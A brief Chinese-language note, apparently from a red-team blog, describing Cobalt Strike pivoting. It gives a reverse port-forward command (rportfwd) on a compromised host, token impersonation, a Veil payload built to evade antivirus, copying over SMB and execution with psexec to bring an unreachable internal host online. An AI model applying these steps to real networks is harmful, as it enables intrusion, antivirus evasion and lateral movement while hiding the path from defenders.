Cobalt Striker不使用smb beacon 内网中继主机上线
不使用smb beacon 内网中继主机上线
1 已控一台能链接teamserver的主机,假设IP为172.16.1.1
2 该主机能链接的机器无权限链接teamserver,假设IP为172.20.1.1
3 该主机不能走smb beacon,或者smb不稳定
添加一个新的listenters
然后在172.16.1.1中执行
rportfwd 12345 teamserver_ip 12345
然后再make_token
然后就可以通过生成veil的payload去免杀,然后把通过smb复制到远程主机
在通过psexec把payload跑起来即可
最后该机器上线后的外网ip会显示teamserver的ip,而不是172.16.1.1
也不会出现在之前的拓扑图中